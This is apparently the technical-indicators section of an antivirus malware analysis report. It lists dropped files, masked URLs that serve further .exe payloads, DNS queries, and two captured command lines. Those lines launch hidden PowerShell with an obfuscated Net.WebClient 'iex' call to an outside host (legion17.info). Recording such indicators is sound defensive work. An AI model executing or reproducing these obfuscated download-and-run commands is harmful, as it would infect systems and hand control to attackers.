Technical Information
- '' (downloaded from the Internet)
- p.exe
- pa.exe
- <Current directory>\p.exe
- <Current directory>\pa.exe
- <Current directory>\foo.txt
- http://no####pporno.info/gate1.php?a=#####################################
- http://ip###ger.org/1lGui
- http://no####pporno.info/gate1.php?a=####
- http://no####pporno1.info/test/eu/1.exe
- http://no####pporno1.info/test/eu/2.exe
- DNS ASK no####pporno.info
- DNS ASK ip###ger.org
- DNS ASK no####pporno1.info
- DNS ASK drive.google.com
- ClassName: '' WindowName: ''
- '<Current directory>\p.exe'
- '<Current directory>\pa.exe'
- '%WINDIR%\syswow64\cmd.exe' /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex############################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.info/leg#...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command "&{$t='#i#ex############################@(n#ew###-#ob#jec#t N#####et#.W#eb#Cl#ie#nt#).#Up#loa#d#####St#ri#ng(#''h#t#tp#:#//legion17.info/leg#ion1#7#/#w#el#co#me''#,...